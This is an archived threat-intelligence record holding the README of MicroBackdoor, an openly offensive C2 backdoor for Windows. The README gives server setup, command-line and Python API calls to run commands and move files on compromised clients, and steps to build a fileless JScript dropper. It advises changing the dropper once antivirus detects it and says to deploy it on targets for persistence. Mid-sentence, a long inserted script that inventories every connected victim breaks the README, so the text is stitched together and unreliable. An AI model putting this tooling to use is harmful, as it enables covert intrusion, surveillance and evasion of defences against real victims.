{
	"id": "bafa263b-1aa5-42be-8d78-65977e3c09aa",
	"created_at": "2026-04-06T00:19:38.927728Z",
	"updated_at": "2026-04-10T03:21:15.235896Z",
	"deleted_at": null,
	"sha1_hash": "d4b7cea45a61e93a4fcb2ae2e2f8022c1e7da2f4",
	"title": "GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for Windows targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 781448,
	"plain_text": "GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for\r\nWindows targets\r\nBy Cr4sh\r\nArchived: 2026-04-05 20:14:46 UTC\r\nMicro Backdoor for Windows\r\nMicro Backdoor is a C2 tool for Windows targets with an easily customizable code base and a small footprint. Micro\r\nBackdoor consists of a server, a client and a dropper. It wasn't designed as a replacement for your favorite post-exploitation tools but rather as a really minimalistic thing with all of the basic features in less than 5000 lines of\r\ncode; the client DLL is less than 20 KB without compression.\r\nI'm using Micro Backdoor mostly for demonstration purposes as a payload for my firmware rootkits and various\r\nlow level persistence techniques. Its code was written in a couple of nights, so it might contain bugs and\r\nvulnerabilities: use it at your own risk.\r\nGeneral information\r\nWeb interface screenshots\r\nConfiguring the server\r\nUsing Python API\r\nDeploying the server\r\nBuilding Docker container\r\nConfiguring the client\r\nGeneral information\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 1 of 10\n\nThe Micro Backdoor client supports 32-bit and 64-bit versions of Windows XP, Vista, 7, 8, 8.1, 10, Server 2003,\r\nServer 2003 R2, Server 2008, Server 2008 R2, Server 2012, Server 2012 R2, Server 2016 and Server 2019 of any\r\neditions, languages and service packs.\r\nKey features of the Micro Backdoor:\r\nThe client dropper is written in Microsoft JScript, which makes it extremely convenient for obfuscation: once\r\nAV starts to detect the dropper you can easily modify its code or apply existing JScript obfuscation tools.\r\nThe client can detect a SOCKS 4, SOCKS 5 or HTTP proxy configured in the system settings and\r\nconnect to the server through that proxy.\r\nTo communicate with the server, the Micro Backdoor client uses an end-to-end encrypted protocol with\r\nRSA authentication and a random session key.\r\nThe client dropper does not create any executable files on disk: its 
body is stored inside Windows registry\r\nvalues, which reduces the backdoor footprint and makes it stealthier.\r\nThe backdoor server is written in Python and can be used on any operating system. It provides a clean and\r\nsimple web interface for interacting with connected clients in a convenient way. A Redis database is\r\nused to store client state.\r\nThe backdoor server keeps track of all client and server events in log files.\r\nFor each connected client Micro Backdoor provides a semi-interactive command shell running in the web\r\nbrowser.\r\nMicro Backdoor has a convenient file manager that lets you browse the client file system and download and\r\nupload files.\r\nFull Unicode and native language support in both client and server.\r\nThe backdoor server also provides a Python API and a command line interface to perform any action on\r\nconnected clients, which is useful for automation and scripting.\r\nWeb interface screenshots\r\nMain web interface page with connected clients list: (screenshot)\r\nCommand shell page: (screenshot)\r\nFile manager page: (screenshot)\r\nConfiguring the server\r\nThe Micro Backdoor server code is located in the ./server directory; upload its contents to the remote\r\nmachine where you plan to run the server.\r\nDirectory contents:\r\nserver.py − Server executable file\r\nconfig.py − Server configuration file\r\naccess.log − Access log of the embedded web server used for the admin interface\r\nserver.log − Server log file with messages related to connected clients\r\nserver.crt − Server RSA certificate used to encrypt client communication\r\nserver.key − Server RSA private key, see above\r\ndownloads/ − Directory to store files downloaded from the clients\r\nlogs/ − Directory with individual command line history files for each client\r\nstatic/ − Directory with static files needed for admin 
interface\r\nThe Python program server.py has a lot of command line options used to configure and manage the server, interact\r\nwith connected clients, etc. Here’s how to get the server running:\r\n1. Install the needed dependencies:\r\n$ sudo apt-get install build-essential swig libssl-dev python python-dev python-setuptools python-pip\r\n$ sudo pip install m2crypto pycrypto redis cherrypy defusedxml\r\n2. Install and run the Redis database server:\r\n$ sudo apt-get install redis-server\r\n$ sudo service redis-server start\r\n3. Edit the config.py file and change the default values of HTTP_USERS and HTTP_PATH to secure your server\r\ninstallation.\r\n4. Generate the RSA key pair for a new installation of the server; it will create the server.crt and server.key\r\nfiles:\r\n5. Run the server as a background process:\r\n6. Shut down the server:\r\nAlternatively, you can run server.py with no command line options specified to start the server as an interactive\r\nshell process (useful for debugging). 
After the server has started you can open the admin interface in the web\r\nbrowser; its URL is composed from the HTTP_ADDR, HTTP_PORT and HTTP_PATH options of the config.py\r\nconfiguration file.\r\nThere are also some options to interact with connected clients from the command line.\r\nRetrieve and print the list of currently connected clients:\r\nExecute a command on a connected client:\r\n$ ./server.py --client \u003cclient_ID\u003e --exec \u003ccommand\u003e\r\nUpload a file to a connected client:\r\n$ ./server.py --client \u003cclient_ID\u003e --fput \u003cremote_path\u003e --file \u003clocal_path\u003e\r\nDownload a file from a connected client:\r\n$ ./server.py --client \u003cclient_ID\u003e --fget \u003cremote_path\u003e --file \u003clocal_path\u003e\r\nUpdate Micro Backdoor on the client:\r\n$ ./server.py --client \u003cclient_ID\u003e --update \u003cdropper_path\u003e\r\nUsing Python API\r\nAs mentioned above, the Micro Backdoor server also provides a Python API to interact with connected clients,\r\nwhich is quite useful for automation and scripting purposes. 
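As an added end-to-end example, not taken from the MicroBackdoor README or code base, the script below uses the ClientHelper API documented in this section (client_list, mapper_connect, execute, execute_wmi and file_list) to inventory every connected client in one pass: user, hostname, OS caption and the profile folders under the Users directory. The FakeClient class, the probe directory and all canned replies are constructed for the example so that it also runs offline; against a real server the same sweep() call is made with ClientHelper itself.

```python
# Added example: it is not part of the MicroBackdoor README or code base. It
# sweeps every connected client through the ClientHelper API documented in the
# README (client_list, mapper_connect, execute, execute_wmi, file_list) and
# builds one inventory dict per client. FakeClient and its canned replies are
# constructed here so the script also runs offline without a live server.
try:
    from server import ClientHelper          # importable only inside ./server
except ImportError:                          # offline run: use the fake below
    ClientHelper = None

BACKSLASH = chr(92)                          # Windows path separator
CRLF = chr(13) + chr(10)                     # cmd.exe output line ending
PROFILE_DIR = 'C:' + BACKSLASH + 'Users'     # assumed probe directory


def collect_inventory(client, probe_dir=PROFILE_DIR):
    '''Run a fixed set of read-only probes on one already connected client.

    execute() returns (output, exit_code) per the README; a non-zero exit code
    marks the probe as failed and its output is discarded instead of trusted.
    file_list() yields (size, name) with size None for directories.
    '''
    inventory = {}
    for label, command in (('user', 'whoami'), ('host', 'hostname')):
        output, exit_code = client.execute(command)
        inventory[label] = output.strip() if exit_code == 0 else None
        inventory[label + '_exit'] = exit_code
    # README: execute_wmi('os', props='Caption') returns just the OS caption
    inventory['os'] = client.execute_wmi('os', props='Caption')
    dirs, files = [], []
    for size, name in client.file_list(probe_dir):
        (dirs if size is None else files).append(name)
    inventory['profiles'] = sorted(dirs)     # user profile folders found
    inventory['loose_files'] = len(files)
    return inventory


def sweep(list_clients, open_client):
    '''Inventory every client returned by list_clients().

    open_client(client_id) must return an object with the ClientHelper
    interface; for the real server pass ClientHelper itself.
    '''
    report = {}
    for entry in list_clients():
        client = open_client(entry.client_id)
        client.mapper_connect()              # attach to the server child process
        inventory = collect_inventory(client)
        inventory['addr'] = entry.addr[0]
        report[entry.client_id] = inventory
    return report


class FakeClient(object):
    '''Constructed stand-in with canned answers; not a real client.'''

    def __init__(self, client_id, addr=('203.0.113.7', 49152)):
        self.client_id, self.addr, self.connected = client_id, addr, False

    def mapper_connect(self):
        self.connected = True

    def execute(self, command):
        if not self.connected:
            raise RuntimeError('mapper_connect() was not called')
        replies = {'whoami': ('corp' + BACKSLASH + 'alice' + CRLF, 0),
                   'hostname': ('WS-01' + CRLF, 0)}
        return replies.get(command, ('', 1))  # unknown command: empty, exit 1

    def execute_wmi(self, cls, props=None):
        caption = 'Microsoft Windows 10 Pro'
        return caption if props == 'Caption' else {'Caption': caption}

    def file_list(self, path):
        return [(None, 'alice'), (None, 'Public'), (174, 'desktop.ini')]


if __name__ == '__main__':
    if ClientHelper is None:
        print('server module not importable, using the constructed FakeClient')
        report = sweep(lambda: [FakeClient('demo')], FakeClient)
    else:
        report = sweep(ClientHelper().client_list, ClientHelper)
    for client_id, inv in report.items():
        print('%s %s user=%s host=%s os=%s profiles=%s' % (
            client_id, inv['addr'], inv['user'], inv['host'], inv['os'],
            ', '.join(inv['profiles'])))
```

Run it from inside ./server so that the server module is importable; anywhere else it falls back to the constructed FakeClient. Probes are kept read-only on purpose and a failed command (non-zero exit code) is recorded as None rather than having its output treated as a valid answer.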
Here are some examples of how to use this API.\r\nObtain and print the connected clients list:\r\nfrom server import ClientHelper\r\n# get clients list\r\nclients = ClientHelper().client_list()\r\nfor client in clients:\r\n    # print client information\r\n    print('ID = %s, addr = %s' % (client.client_id, client.addr[0]))\r\nExecute a console command on the client:\r\nimport sys\r\nfrom server import ClientHelper\r\n# create client helper instance for a client_id taken from the list above\r\nclient = ClientHelper(client_id)\r\n# connect to the corresponding child process of the server\r\nclient.mapper_connect()\r\n# execute console command, get its output and exit code\r\noutput, exit_code = client.execute('whoami')\r\n# execute console command and redirect its output into the stream\r\nclient.execute('whoami', stream = sys.stdout)\r\nWork with the file system of the client:\r\n# create client helper instance\r\nclient = ClientHelper(client_id)\r\n# connect to the corresponding child process of the server\r\nclient.mapper_connect()\r\n# download file from the client\r\nclient.file_get('C:\\\\Windows\\\\win.ini', 'win.ini')\r\n# upload file to the client\r\nclient.file_put('C:\\\\Users\\\\Test\\\\example.txt', 'example.txt')\r\n# enumerate files in some directory\r\nfor size, name in client.file_list('C:\\\\Windows'):\r\n    if size is None:\r\n        # print directory name\r\n        print(' DIR: %s' % name)\r\n    else:\r\n        # print file name and size\r\n        print('FILE: %s [%d bytes]' % (name, size))\r\nExecute WMI queries on the client:\r\n# create client helper instance\r\nclient = ClientHelper(client_id)\r\n# connect to the corresponding child process of the server\r\nclient.mapper_connect()\r\n# get CIM_OperatingSystem WMI class\r\nfor name, value in client.execute_wmi('os').items():\r\n    # print class member name and value\r\n    print('%s = %s' % (name, value))\r\n# get only the \"Caption\" class member value\r\nos_name = client.execute_wmi('os', props = 'Caption')\r\nDeploying the server\r\nFor easy deployment of the Micro Backdoor server there's a Fabric scenario 
located in the fabfile.py Python script. To\r\ndeploy the server to a remote Linux host, perform the following steps.\r\n1. Edit the .ssh_config file located in the project directory and add your server information there, for example:\r\nHost my-server\r\n    HostName my-server.net\r\n    Port 22\r\n    User user\r\n    IdentityFile ~/.ssh/id_rsa\r\n2. Run ./server.py --keys on your local machine to generate the RSA key pair for secure communication\r\nbetween the Micro Backdoor client and server.\r\n3. Run the fab deps:host=my-server command to connect to the remote host my-server over SSH and\r\ninstall the needed dependencies.\r\n4. Run the fab deploy:host=my-server command to copy the needed files to the remote host my-server and run\r\nthe server.\r\n5. You can also run fab stop to stop the running server, fab start to start it and fab uninstall to\r\nshut it down and remove its files from the remote host.\r\nBuilding Docker container\r\nYou can also run the Micro Backdoor server inside a Docker container with SSH and Redis servers included. To install\r\nDocker on Ubuntu just run sudo apt-get install docker.io; for other distributions and operating systems\r\nplease refer to the official documentation.\r\nBefore building the container you need to run ./server.py --keys on your local machine to generate the RSA key\r\npair for secure communication between the Micro Backdoor client and server. Then cd into the docker\r\ndirectory and run make to build the Docker image and start the container. To stop the running container you can press\r\nCtrl+C; use the make start / make stop commands to run it in the background, make rm to remove the container\r\nand make rmi to remove the image. 
To ssh into the running container run make shell and enter the password\r\nspecified in the docker/makefile.conf file (\"acab\" without quotes by default).\r\nNOTE: Before building the Docker container please ensure that the exposed TCP ports specified in\r\ndocker/makefile.conf are the same as the CLIENT_PORT and HTTP_PORT port numbers specified in config.py of\r\nthe server.\r\nConfiguring the client\r\nThe Micro Backdoor client consists of the binary part that implements the backdoor functionality and a JScript\r\nwrapper combined with the shellcode used to run and deliver the binary part in a file-less way.\r\n⚠️ The JScript and PowerShell code used in the client dropper is easily detected by most AV/EDR products;\r\nyou should consider modifying it or using other methods to deliver the binary part of the client.\r\nFirst, you have to configure the binary using the ./client_builder.py command line program; it uses the\r\ndefault configuration specified in the ./server/config.py file mentioned in the previous part of the document.\r\nInstall the Python pefile library:\r\nConfigure the client binary:\r\n$ ./client_builder.py client.dll [server_IP]\r\nAlso, you can specify the client_amd64.dll file to use the x86_64 version of the client, or\r\nclient_debug.dll / client_amd64_debug.dll to use a debug build of the client that prints diagnostic messages\r\ninto the standard Windows debug output. Before running client_builder.py you need to generate the RSA key pair,\r\nsee the Configuring the server section of this document.\r\nYou can use the configured client binary with your own delivery tool (exploit, reflective loader, etc.), or you can\r\ngenerate the JScript client dropper:\r\n$ ./client_encoder.py dll_inject_script client.dll \u003e dropper.js\r\nPlease note that the JScript/PowerShell reflective loader generated by client_encoder.py works only with 32-bit\r\nversions of the client binary on both 32-bit and 64-bit Windows targets. 
64-bit client binaries are provided only\r\nfor convenience in case you need to use them with your own loaders and tools.\r\nAfter dropper.js has been generated you can deploy it on your targets. From the Windows command line you can run\r\nJScript files with cscript.exe dropper.js, or you can just double-click the JS file in Windows Explorer to\r\nrun the dropper. The Micro Backdoor client provides persistence within the current user account used to run the dropper; it\r\ncan work with any privileges and at medium integrity level.\r\nDeveloped by\r\nDmytro Oleksiuk (aka Cr4sh)\r\ncr4sh0@gmail.com\r\nhttp://blog.cr4.sh\r\n@d_olex\r\nSource: https://github.com/cr4sh/microbackdoor",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/cr4sh/microbackdoor"
	],
	"report_names": [
		"microbackdoor"
	],
	"threat_actors": [],
	"ts_created_at": 1775434778,
	"ts_updated_at": 1775791275,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d4b7cea45a61e93a4fcb2ae2e2f8022c1e7da2f4.pdf",
		"text": "https://archive.orkl.eu/d4b7cea45a61e93a4fcb2ae2e2f8022c1e7da2f4.txt",
		"img": "https://archive.orkl.eu/d4b7cea45a61e93a4fcb2ae2e2f8022c1e7da2f4.jpg"
	}
}